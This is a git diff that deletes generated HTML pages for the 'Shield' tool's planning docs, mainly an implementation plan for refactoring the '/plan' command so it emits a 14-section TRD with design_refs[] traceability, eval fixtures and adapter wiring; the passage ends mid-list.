-M3 Drift + duplication hardening                ← P2 (follows M2)
-└─ EPIC-5: Drift + duplication hardening
-    ├─ S1 Add last_aligned_with metadata to plan.json
-    └─ S2 Add implementation-manual / pseudo-code lint rule
-</code></pre>
-<h2 id="key-architectural-decisions">Key architectural decisions</h2>
-<p>The TRD section list, anchor strategy, <code>design_refs[]</code> shape, de-duplication contract, and failure-mode countermeasures are all locked in <code>research.md</code>. The decisions specific to this implementation plan are:</p>
-<ol>
-<li><strong>Direct cutover, no feature flag.</strong> EPIC-1-S2 swaps <code>plan-architecture.md</code> for <code>trd.md</code> in <code>/plan</code>'s output set. No <code>.shield.json</code> toggle.</li>
-<li><strong>One TRD, two domains.</strong> Same 14-section template applies to backend and infra work. <code>/plan</code>'s SKILL.md carries domain-aware prompting per section (backend interpretation + infra interpretation), and the eval accepts <code>n/a — &lt;reason&gt;</code> as an escape for sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change).</li>
-<li><strong>§14 Rollback Strategy is a first-class section</strong> — preserves the strongest property of today's <code>plan-architecture.md</code>.</li>
-<li><strong>Old feature folders are left untouched.</strong> EPIC-1-S3 explicitly guards against deleting existing <code>plan-architecture.md</code> files. Git history is the archive.</li>
-<li><strong>M1 ships as a single PR.</strong> Generator, schema, and eval land together. The eval cannot ship before the generator (no fixture to validate); the generator should not ship without the eval (regression risk on first re-run). Land them atomically.</li>
-<li><strong><code>design_refs[]</code> is additive and zero-risk.</strong> Bumps sidecar schema 1.1 → 1.2. Adapters that don't understand the field ignore it; no <code>/pm-sync</code> schema break (EPIC-4-S3 is the additive forward-link wiring).</li>
-<li><strong>LLD references are TODO placeholders in v1.</strong> <code>design_refs[]</code> entries with <code>doc: &quot;lld&quot;</code> carry <code>anchor_url: null</code> and <code>label: &quot;TODO: link when /lld &lt;component&gt; lands&quot;</code>. When <code>/lld</code> ships in a later epic, those placeholders get resolved. LLDs are typically backend-only.</li>
-<li><strong>Eval is the structural enforcement mechanism.</strong> Per CLAUDE.md eval-coverage mandate, M1 ships with <strong>two</strong> positive fixtures (one backend, one infra), one missing-section negative per required section, one drift-by-addition negative, and one &quot;vague-prose-instead-of-<code>n/a</code>&quot; negative. RED → GREEN paper trail captured in the PR body (EPIC-3-S3).</li>
-</ol>
-<h2 id="deliverables-per-milestone">Deliverables (per milestone)</h2>
-<h3 id="m1--trd-cutover-one-pr">M1 — TRD cutover (one PR)</h3>
-<ul>
-<li><code>shield/commands/plan.md</code> — emits <code>trd.md</code> not <code>plan-architecture.md</code></li>
-<li><code>shield/skills/general/plan-docs/SKILL.md</code> — 14-section TRD template + generation prompt with <strong>domain-aware section guidance</strong> (backend interpretation + infra interpretation per section)</li>
-<li><code>shield/skills/general/plan-docs/sidecar-schema.md</code> — schema bumped to 1.2 with <code>design_refs[]</code> documented</li>
-<li><code>shield/schema/output-paths.yaml</code> — <code>plan_arch_md</code>/<code>plan_arch_html</code> replaced by <code>plan_trd_md</code>/<code>plan_trd_html</code></li>
-<li><code>shield/evals/plan-trd.yaml</code> — 2 positives (backend + infra) + 14 missing-section negatives + 1 drift-by-addition negative + 1 vague-prose-instead-of-<code>n/a</code> negative</li>
-<li><code>shield/evals/plan-trd/fixtures/positive-backend/</code> — full 14-section TRD fixture for a backend feature</li>
-<li><code>shield/evals/plan-trd/fixtures/positive-infra/</code> — full 14-section TRD fixture for an infra change (with <code>n/a — &lt;reason&gt;</code> on at least one section)</li>
-<li><code>shield/evals/plan-trd/fixtures/missing-*/</code> — 14 missing-section negative fixtures</li>
-<li><code>shield/evals/plan-trd/fixtures/extra-section/</code> — drift-by-addition negative fixture</li>
-<li><code>shield/evals/plan-trd/fixtures/vague-tbd/</code> — section with &quot;TBD&quot; instead of <code>n/a — &lt;reason&gt;</code>; eval must fail</li>
-</ul>
-<h3 id="m2--review--sync-wiring-one-pr">M2 — Review + sync wiring (one PR)</h3>
-<ul>
-<li><code>shield/skills/general/plan-review/SKILL.md</code> — 14-section presence rule + stale-anchor rule + duplication-detection rule</li>
-<li><code>shield/commands/pm-sync.md</code> — describes <code>design_refs[]</code> forwarding</li>
-<li><code>shield/adapters/&lt;each&gt;/...</code> — Confluence, Jira, ClickUp, Notion adapters forward <code>design_refs[]</code> as web links</li>
-<li><code>shield/evals/plan-review-trd.yaml</code> — fixtures exercising both new review rules</li>
-<li>Per-adapter eval fixtures</li>
-</ul>
-<h3 id="m3--drift--duplication-hardening-one-pr">M3 — Drift + duplication hardening (one PR)</h3>
-<ul>
-<li><code>shield/skills/general/plan-docs/sidecar-schema.md</code> — schema bumped to 1.3 with <code>last_aligned_with</code></li>
-<li><code>shield/skills/general/implement/SKILL.md</code> (or equivalent) — updates <code>last_aligned_with</code> on story close</li>
-<li><code>shield/skills/general/plan-review/SKILL.md</code> — implementation-manual lint rule</li>
-<li>Eval fixtures for both new rules</li>
-</ul>
-<h2 id="rollback-strategy">Rollback strategy</h2>
-<p>The refactor is a direct cutover; reversibility cost is low.</p>
-<ul>
-<li><strong>Forward:</strong> Three PRs (M1, M2, M3), sequenced by <code>depends_on</code>.</li>
-<li><strong>Reversal:</strong> Revert <code>plan-docs/SKILL.md</code> to the pre-refactor template + restore <code>plan-architecture.md</code> generation. Existing <code>trd.md</code> files in feature folders remain readable. <code>design_refs[]</code> is optional everywhere, so removing it is a no-op for downstream adapters. <code>last_aligned_with</code> is also optional and reverting drops it without breaking older sidecars.</li>
-<li><strong>No migration:</strong> Pre-refactor feature folders keep their <code>plan-architecture.md</code> — no rewrite, no script.</li>
-</ul>
-<h2 id="out-of-scope">Out of scope</h2>
-<p>The following are deferred and tracked in <code>plan.json</code> <code>metadata.out_of_scope</code>:</p>
-<ul>
-<li><code>/lld &lt;component&gt;</code> command (template locked, command is a separate epic).</li>
-<li>Adapter auto-creation of Confluence/Notion design-doc pages.</li>
-<li>Structured ClickUp/Notion relationships beyond URL fields.</li>
-<li>Migration tool for existing <code>plan-architecture.md</code>.</li>
-</ul>
-<h2 id="what-to-do-next">What to do next</h2>
-<ul>
-<li><code>/plan-review docs/shield/plan-trd-refactor-20260524/plan.json</code> — multi-agent review against the rubric.</li>
-<li><code>/pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool clickup</code> (or jira, notion) — sync stories to your PM tool.</li>
-<li><code>/implement</code> — TDD-driven implementation, starting with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan.html
deleted file mode 100644
index 722fc9fe..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html
+++ /dev/null
@@ -1,430 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Plan — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#milestones">Milestones</a>
-</li>
-<li><a href="#epic-1--trd-generation-and-storage----m1">EPIC-1 · TRD generation and storage  ·  M1</a>
-<ul>
-<li><a href="#epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting----priority-high">EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting  ·  priority: high</a></li>
-<li><a href="#epic-1-s2--update-plan-to-emit-trdmd-unified-backend--infra----priority-high">EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra)  ·  priority: high</a></li>
-<li><a href="#epic-1-s4--bump-plugin-version-per-claudemd-mandate----priority-high">EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate  ·  priority: high</a></li>
-<li><a href="#epic-1-s3--update-existing-feature-behavior-on-re-run----priority-medium">EPIC-1-S3 · Update existing-feature behavior on re-run  ·  priority: medium</a></li>
-</ul>
-</li>
-<li><a href="#epic-2--story-schema-and-design-traceability----m1">EPIC-2 · Story schema and design traceability  ·  M1</a>
-<ul>
-<li><a href="#epic-2-s1--extend-planjson-schema-with-optional-design_refs----priority-high">EPIC-2-S1 · Extend plan.json schema with optional design_refs[]  ·  priority: high</a></li>
-<li><a href="#epic-2-s2--populate-design_refs-when-plan-has-trd-context----priority-high">EPIC-2-S2 · Populate design_refs[] when /plan has TRD context  ·  priority: high</a></li>
-<li><a href="#epic-2-s3--add-json-schema-validator-for-planjson----priority-high">EPIC-2-S3 · Add JSON Schema validator for plan.json  ·  priority: high</a></li>
-</ul>
-</li>
-<li><a href="#epic-3--eval-coverage-for-trd-format----m1">EPIC-3 · Eval coverage for TRD format  ·  M1</a>
-<ul>
-<li><a href="#epic-3-s1--author-positive-trd-eval-fixtures-backend--infra----priority-high">EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra)  ·  priority: high</a></li>
-<li><a href="#epic-3-s2--author-missing-section--drift--vague-tbd-negative-fixtures----priority-high">EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures  ·  priority: high</a></li>
-<li><a href="#epic-3-s3--wire-eval-into-ci--red-green-paper-trail----priority-high">EPIC-3-S3 · Wire eval into CI / RED-GREEN paper trail  ·  priority: high</a></li>
-</ul>
-</li>
-<li><a href="#epic-4--plan-review-and-pm-sync-wiring----m2">EPIC-4 · /plan-review and /pm-sync wiring  ·  M2</a>
-<ul>
-<li><a href="#epic-4-s0--scaffold-jira--confluence--notion-adapter-packages----priority-high">EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages  ·  priority: high</a></li>
-<li><a href="#epic-4-s1--add-14-section-presence-rule--stale-anchor-rule-to-plan-review----priority-high">EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review  ·  priority: high</a></li>
-<li><a href="#epic-4-s2--add-prdtrd-duplication-detection-rule-to-plan-review----priority-medium">EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review  ·  priority: medium</a></li>
-<li><a href="#epic-4-s3--pm-sync-emits-design_refs-as-web-links-with-idempotent-upsert----priority-high">EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert  ·  priority: high</a></li>
-</ul>
-</li>
-<li><a href="#epic-5--drift--duplication-hardening----m3">EPIC-5 · Drift + duplication hardening  ·  M3</a>
-<ul>
-<li><a href="#epic-5-s1--add-last_aligned_with-metadata-to-planjson----priority-medium">EPIC-5-S1 · Add last_aligned_with metadata to plan.json  ·  priority: medium</a></li>
-<li><a href="#epic-5-s2--add-implementation-manual--pseudo-code-lint-rule-to-plan-review----priority-low">EPIC-5-S2 · Add implementation-manual / pseudo-code lint rule to /plan-review  ·  priority: low</a></li>
-</ul>
-</li>
-<li><a href="#out-of-scope-locked">Out of scope (locked)</a>
-</li>
-<li><a href="#next-steps">Next steps</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan--plan-trd-refactor">Plan — <code>/plan</code> TRD refactor</h1>
-<p><strong>Feature:</strong> <code>plan-trd-refactor-20260524</code> · <strong>Phase:</strong> v1 cutover · <strong>Source:</strong> <a href="../research.md"><code>research.md</code></a> · <a href="../plan-architecture.md"><code>plan-architecture.md</code></a>
-<strong>Sidecar:</strong> <a href="../plan.json"><code>plan.json</code></a> (schema v1.1)</p>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>M1</strong></td>
-<td>TRD cutover</td>
-<td><code>/plan</code> emits <code>trd.md</code> (14 sections, stable anchors, domain-aware prompting for backend/infra/mixed, atomic write, provenance stamp); <code>plan.json</code> carries optional <code>design_refs[]</code>; JSON schema validator wired; recurring CI gate runs the eval; coverage = 3 positives (backend + infra + mixed) + 16 negatives.</td>
-<td>—</td>
-</tr>
-<tr>
-<td><strong>M2</strong></td>
-<td>Review + sync wiring</td>
-<td><code>/plan-review</code> grades against 14-section rubric (with <code>n/a — &lt;reason&gt;</code> escape) + duplication rule + stale-anchor rule; <code>/pm-sync</code> adapters forward <code>design_refs[]</code> as web links with idempotent upsert (sha256 globalId).</td>
-<td>M1</td>
-</tr>
-<tr>
-<td><strong>M3</strong></td>
-<td>Drift + duplication hardening</td>
-<td><code>last_aligned_with</code> metadata + implementation-manual lint rule.</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--trd-generation-and-storage----m1">EPIC-1 · TRD generation and storage  ·  M1</h2>
-<h3 id="epic-1-s1--author-the-canonical-14-section-trd-template-with-domain-aware-prompting----priority-high">EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting  ·  <code>priority: high</code></h3>
-<p>Encode the 14-section TRD template (Document Overview through Rollback Strategy) in <code>plan-docs/SKILL.md</code> or a sibling <code>templates.md</code>. Each section has TWO authoring-guidance paragraphs: one for backend interpretation, one for infra interpretation. Sections that may not apply to one domain are documented with the <code>n/a — &lt;reason&gt;</code> escape pattern from the LLD sample's §12. Each section header in the emitted markdown carries an explicit <code>{#section-id}</code> kebab-case anchor.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a 'TRD template' subsection to <code>shield/skills/general/plan-docs/SKILL.md</code> (or extend <code>templates.md</code>) listing all 14 section titles, slug IDs, and per-domain authoring guidance sourced from <code>research.md §What the Industry Recommends</code>.</li>
-<li>Define the canonical slug allow-list: <code>['document-overview','problem-statement','objective-scope','product-journey','functional-requirements','non-functional-requirements','high-level-design','alternatives-considered','cross-cutting-concerns','milestones','apis-involved','open-questions','references','rollback-strategy']</code>.</li>
-<li>Document the explicit <code>{#section-id}</code> markdown-anchor convention used by <code>/plan</code> output.</li>
-<li>Document the <code>n/a — &lt;reason&gt;</code> escape: any section may declare <code>n/a — &lt;reason&gt;</code> when it genuinely doesn't apply (typical use: §4 on pure-infra plans). Vague TBDs and silent omissions are not allowed.</li>
-<li>Per-section domain guidance must explicitly call out where the infra interpretation differs from backend (notably §4, §5, §6, §7, §11, §14).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>shield/skills/general/plan-docs/SKILL.md</code> (or <code>templates.md</code>) contains the 14-section TRD template with slug IDs and per-domain authoring guidance.</li>
-<li>The slug allow-list is published as a machine-readable list (YAML or JSON sidecar under <code>shield/schema/</code>) so the eval can import it; the list has exactly 14 entries.</li>
-<li>A reader following <code>plan-docs/SKILL.md</code> can identify which section a given heading belongs to AND which domain interpretation applies, without re-reading <code>research.md</code>.</li>
-<li>The <code>n/a — &lt;reason&gt;</code> escape pattern is documented with at least one worked example per applicable section.</li>
-</ul>
-<h3 id="epic-1-s2--update-plan-to-emit-trdmd-unified-backend--infra----priority-high">EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra)  ·  <code>priority: high</code></h3>
-<p>Modify <code>shield/commands/plan.md</code> and <code>shield/skills/general/plan-docs/SKILL.md</code> so <code>/plan</code> writes <code>trd.md</code> with all 14 sections for <strong>both backend and infrastructure features</strong>. Stop emitting <code>plan-architecture.md</code> going forward. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain and surfaces the right per-section authoring guidance (backend vs infra) for the LLM.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Replace the 'Generate plan-architecture.md' step in <code>shield/commands/plan.md</code> with 'Generate trd.md per the unified 14-section template'.</li>
-<li>Update <code>shield/skills/general/plan-docs/SKILL.md</code> generation prompt to walk the 14 sections, select the domain-appropriate authoring guidance per section, and emit explicit <code>{#section-id}</code> anchors.</li>
-<li>Domain detection: reuse the existing detection (<code>*.tf</code> / <code>atmos.yaml</code> / <code>Chart.yaml</code> → infra; <code>pom.xml</code> / <code>pyproject.toml</code> / <code>package.json</code> / <code>go.mod</code> → backend). Mixed → annotate per section.</li>
-<li>Update <code>shield/schema/output-paths.yaml</code>: replace <code>plan_arch_md</code> with <code>plan_trd_md</code> (<code>{output_dir}/{feature}/trd.md</code>) and <code>plan_arch_html</code> with <code>plan_trd_html</code> (<code>{output_dir}/{feature}/outputs/trd.html</code>). Mirror in <code>shield/commands/plan.md</code> outputs: frontmatter.</li>
-<li>Update the render-markdown helper invocation in <code>plan-docs/SKILL.md</code> to render <code>trd.md</code> to <code>outputs/trd.html</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/plan</code> in a fresh feature folder writes <code>docs/shield/{feature}/trd.md</code> and <code>docs/shield/{feature}/outputs/trd.html</code>.</li>
-<li><code>/plan</code> no longer writes <code>plan-architecture.md</code> anywhere.</li>
-<li><code>shield/schema/output-paths.yaml</code> lists <code>plan_trd_md</code> and <code>plan_trd_html</code>; <code>plan_arch_md</code> and <code>plan_arch_html</code> are removed.</li>
-<li>Running <code>/plan</code> on a feature folder with only infra markers produces a TRD where the infra interpretation is reflected in §4–7, §11, and §14 prose; sections like §4 may legitimately carry <code>n/a — &lt;reason&gt;</code>.</li>
-<li>Running <code>/plan</code> on a feature folder with only backend markers produces a TRD where the backend interpretation is reflected in §4–7, §11, and §14 prose.</li>
-</ul>
-<h3 id="epic-1-s4--bump-plugin-version-per-claudemd-mandate----priority-high">EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate  ·  <code>priority: high</code></h3>
-<p>CLAUDE.md &quot;Plugin isolation / Versioning&quot; requires bumping <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> in the same commit as any plugin update. Added per SRE P1-12 + DX P2.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Bump <code>.claude-plugin/marketplace.json</code> version field for the Shield plugin entry.</li>
-<li>Bump <code>pyproject.toml</code> version in any package modified (<code>shield/adapters/clickup/pyproject.toml</code>, plus new adapter packages from EPIC-4-S0).</li>
-<li>Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from <code>plan-architecture.md</code> to <code>trd.md</code> and the schema 1.1 → 1.2 bump.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>The M1 PR includes both version bumps in the same commit as the SKILL.md changes.</li>
-<li>CHANGELOG mentions the cutover and the schema bump.</li>
-</ul>
-<hr />
-<h3 id="epic-1-s3--update-existing-feature-behavior-on-re-run----priority-medium">EPIC-1-S3 · Update existing-feature behavior on re-run  ·  <code>priority: medium</code></h3>
-<p>When <code>/plan</code> is re-run in a feature folder that has both an old <code>plan-architecture.md</code> and a new <code>trd.md</code> (or only an old <code>plan-architecture.md</code>), make the behavior deterministic: leave old <code>plan-architecture.md</code> untouched, write/overwrite <code>trd.md</code>. Old folders remain readable; no migration.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a guard in <code>plan-docs/SKILL.md</code> that does not delete <code>plan-architecture.md</code> if it exists.</li>
-<li>Document the re-run behavior in <code>shield/commands/plan.md</code> ('plan-architecture.md is no longer generated; existing files are left in place').</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Re-running <code>/plan</code> on a feature folder with an existing <code>plan-architecture.md</code> does not delete or modify that file.</li>
-<li>The new <code>trd.md</code> is written alongside (or overwrites prior <code>trd.md</code>).</li>
-</ul>
-<hr />
-<h2 id="epic-2--story-schema-and-design-traceability----m1">EPIC-2 · Story schema and design traceability  ·  M1</h2>
-<h3 id="epic-2-s1--extend-planjson-schema-with-optional-design_refs----priority-high">EPIC-2-S1 · Extend plan.json schema with optional design_refs[]  ·  <code>priority: high</code></h3>
-<p>Add an optional <code>design_refs[]</code> array to each story in the <code>plan.json</code> sidecar. Shape: <code>{doc, component?, section_id, anchor_url, label}</code>. Bump sidecar schema to 1.2; preserve back-compat (missing field is ignored).</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/skills/general/plan-docs/sidecar-schema.md</code> to add <code>design_refs[]</code> field on the story record with the field shape above.</li>
-<li>Bump version key in the schema example from <code>'1.1'</code> to <code>'1.2'</code>.</li>
-<li>Document back-compat: 1.1/1.0 sidecars without <code>design_refs[]</code> remain valid.</li>
-<li>Add a 'design_refs[] field' subsection explaining the per-field semantics (<code>doc ∈ {trd, lld, prd}</code>; <code>component</code> for LLD scoping; <code>anchor_url</code> stable across heading renames).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>shield/skills/general/plan-docs/sidecar-schema.md</code> documents <code>design_refs[]</code> with version 1.2.</li>
-<li>A <code>plan.json</code> with no <code>design_refs[]</code> still validates as 1.2.</li>
-<li>A <code>plan.json</code> with <code>design_refs[]</code> populated validates as 1.2.</li>
-</ul>
-<h3 id="epic-2-s2--populate-design_refs-when-plan-has-trd-context----priority-high">EPIC-2-S2 · Populate design_refs[] when /plan has TRD context  ·  <code>priority: high</code></h3>
-<p>When <code>/plan</code> generates stories, populate each story's <code>design_refs[]</code> with a forward link to the TRD section it implements. <code>lld</code> refs are emitted as TODO entries until <code>/lld</code> lands.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Update <code>plan-docs/SKILL.md</code> generation prompt: for each story, identify which TRD §7 (HLD), §10 (Milestones), or §11 (APIs Involved) section the story implements, and emit a <code>design_refs</code> entry pointing at <code>trd.md#{section-id}</code>.</li>
-<li>For LLD references, emit placeholder entries with <code>doc='lld'</code>, <code>component=null</code>, <code>anchor_url=null</code>, <code>label='TODO: link when /lld &lt;component&gt; lands'</code>.</li>
-<li>Document the heuristic for picking <code>section_id</code> (story title keyword → TRD section anchor).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A <code>/plan</code> run on a feature with a <code>trd.md</code> emits at least one <code>design_refs</code> entry per story pointing at a real <code>trd.md</code> anchor.</li>
-<li>Each story has at least one TRD design_ref; LLD refs are emitted as TODO placeholders.</li>
-<li>Re-running <code>/plan</code> does not duplicate entries; existing entries are preserved or updated in place.</li>
-</ul>
-<hr />
-<h3 id="epic-2-s3--add-json-schema-validator-for-planjson----priority-high">EPIC-2-S3 · Add JSON Schema validator for plan.json  ·  <code>priority: high</code></h3>
-<p>Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the drift inflection. Add a pydantic/jsonschema validator now, invoked by <code>/plan-review</code> and the eval runner. New per Backend P1-7.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> (preferred — already in deps via clickup adapter) or <code>jsonschema</code>.</li>
-<li>Schema definition lives at <code>shield/schema/plan-sidecar.schema.json</code> (machine-readable counterpart to <code>sidecar-schema.md</code>).</li>
-<li>Validator is invoked by <code>/plan-review</code> (first check, before rubric) and the eval runner (in EPIC-3-S3 CI workflow).</li>
-<li>Reject unknown <code>doc</code> enum values, enforce <code>design_refs[]</code> cardinality (min 1 per story when populated), reject sidecar versions newer than current.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>uv run shield/scripts/validate_plan.py &lt;path&gt;</code> exits 0 on valid sidecars and non-zero with a named error on invalid ones.</li>
-<li><code>/plan-review</code> invokes the validator before applying rubric checks and aborts on schema failure.</li>
-<li>Sidecar version forward-compat behavior matches the policy in <code>sidecar-schema.md</code>.</li>
-</ul>
-<hr />
-<h2 id="epic-3--eval-coverage-for-trd-format----m1">EPIC-3 · Eval coverage for TRD format  ·  M1</h2>
-<h3 id="epic-3-s1--author-positive-trd-eval-fixtures-backend--infra----priority-high">EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra)  ·  <code>priority: high</code></h3>
-<p>Create <strong>two</strong> positive fixture <code>trd.md</code> files: one for a backend feature (full 14 sections populated with realistic content), one for an infra feature (full 14 sections with realistic content where infra interpretation applies; at least one section uses <code>n/a — &lt;reason&gt;</code> to exercise the escape pattern). The positive eval asserts: all 14 anchors present, each section non-empty OR carrying a valid <code>n/a — &lt;reason&gt;</code> line, slug allow-list matches.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-backend/trd.md</code> with all 14 sections (use Bytebite-style fictional feature so content is realistic).</li>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-infra/trd.md</code> with all 14 sections (use a fictional terraform/atmos change — e.g., new VPC module, new Aurora cluster — so content is realistic). At least one section must use <code>n/a — &lt;reason&gt;</code> (e.g., §4 Product Journey marked <code>n/a — declarative state change, no runtime path</code>).</li>
-<li>Author the corresponding <code>plan.json</code> sidecars with <code>design_refs[]</code> entries pointing at the fixture <code>trd.md</code> anchors.</li>
-<li>Write <code>shield/evals/plan-trd.yaml</code> with both positive cases wired.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>shield/evals/plan-trd/fixtures/positive-backend/trd.md</code> contains all 14 sections with explicit <code>{#section-id}</code> anchors.</li>
-<li><code>shield/evals/plan-trd/fixtures/positive-infra/trd.md</code> contains all 14 sections with explicit <code>{#section-id}</code> anchors and uses <code>n/a — &lt;reason&gt;</code> on at least one section.</li>
-<li>Running the eval on both positive fixtures passes (exit code 0).</li>
-<li>The fixtures are self-contained: no external API calls, no LLM dispatches.</li>
-</ul>
-<h3 id="epic-3-s2--author-missing-section--drift--vague-tbd-negative-fixtures----priority-high">EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures  ·  <code>priority: high</code></h3>
-<p>For each of the 14 required sections, author a fixture <code>trd.md</code> that omits that section. Add one drift-by-addition fixture (unprompted 15th section). Add one vague-TBD fixture (section present but contents are 'TBD' instead of either real content or <code>n/a — &lt;reason&gt;</code>). The eval must fail on each with a named, distinguishable error.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>For each section in the slug allow-list (14 entries), derive a positive fixture and remove only that section to create a negative fixture under <code>shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md</code>.</li>
-<li>Wire each negative fixture into <code>shield/evals/plan-trd.yaml</code> with <code>expected_error</code> including the missing section's slug.</li>
-<li>Add one drift-by-addition negative fixture under <code>shield/evals/plan-trd/fixtures/extra-section/</code>: add an unprompted 15th section; eval fails with 'unexpected section'.</li>
-<li>Add one vague-TBD negative fixture under <code>shield/evals/plan-trd/fixtures/vague-tbd/</code>: §6 Non-Functional Requirements contains only 'TBD' (no real content, no <code>n/a — &lt;reason&gt;</code>); eval fails with 'vague section content'.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>14 missing-section negative fixtures exist, one per required section.</li>
-<li>Running the eval on each missing-section fixture fails with an error naming the missing section's slug.</li>
-<li>The drift-by-addition fixture fails with an 'unexpected section' error.</li>
-<li>The vague-TBD fixture fails with a 'vague section content' error (distinguishable from missing-section).</li>
-</ul>
-<h3 id="epic-3-s3--wire-eval-into-ci--red-green-paper-trail----priority-high">EPIC-3-S3 · Wire eval into CI / RED-GREEN paper trail  ·  <code>priority: high</code></h3>
-<p>Run the eval before and after the <code>/plan</code> command changes land to produce the RED→GREEN paper trail required by CLAUDE.md. Capture both runs in the implementation PR description.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Before any <code>/plan</code> command changes: run the eval and confirm RED (positive fixture missing <code>trd.md</code> → expected fail).</li>
-<li>After <code>/plan</code> changes land: run the eval and confirm GREEN (3 positive fixtures pass; all 16 negatives — 14 missing-section + 1 drift + 1 vague-TBD — fail with the right named errors).</li>
-<li>Capture both run outputs in the PR description.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>PR body contains a 'RED' section showing the eval failing before the changes.</li>
-<li>PR body contains a 'GREEN' section showing the eval passing 3 positives + failing all 16 negatives with named errors after the changes.</li>
-<li>The eval is invocable via <code>uv run shield/evals/run.py plan-trd</code> (or equivalent existing eval runner).</li>
-</ul>
-<hr />
-<h2 id="epic-4--plan-review-and-pm-sync-wiring----m2">EPIC-4 · /plan-review and /pm-sync wiring  ·  M2</h2>
-<h3 id="epic-4-s0--scaffold-jira--confluence--notion-adapter-packages----priority-high">EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages  ·  <code>priority: high</code></h3>
-<p>Only <code>shield/adapters/clickup/</code> exists today as a <code>uv</code> package. EPIC-4-S3 implies four adapters land in one story but three have no <code>pyproject.toml</code>, no <code>tests/</code>, no MCP server skeleton. Scaffold them first. New per Backend P0-3 (repo-grounded — verified).</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/adapters/jira/</code> with <code>pyproject.toml</code>, <code>server/</code> skeleton, <code>tests/</code> with placeholder contract test, <code>.mcp.json</code> entry.</li>
-<li>Same for <code>shield/adapters/confluence/</code>.</li>
-<li>Same for <code>shield/adapters/notion/</code>.</li>
-<li>Create <code>shield/adapters/_common/design_refs.py</code> exposing <code>DesignRef</code>, <code>ForwardResult</code>, <code>ForwardError</code>, and the <code>forward_design_refs</code> protocol interface.</li>
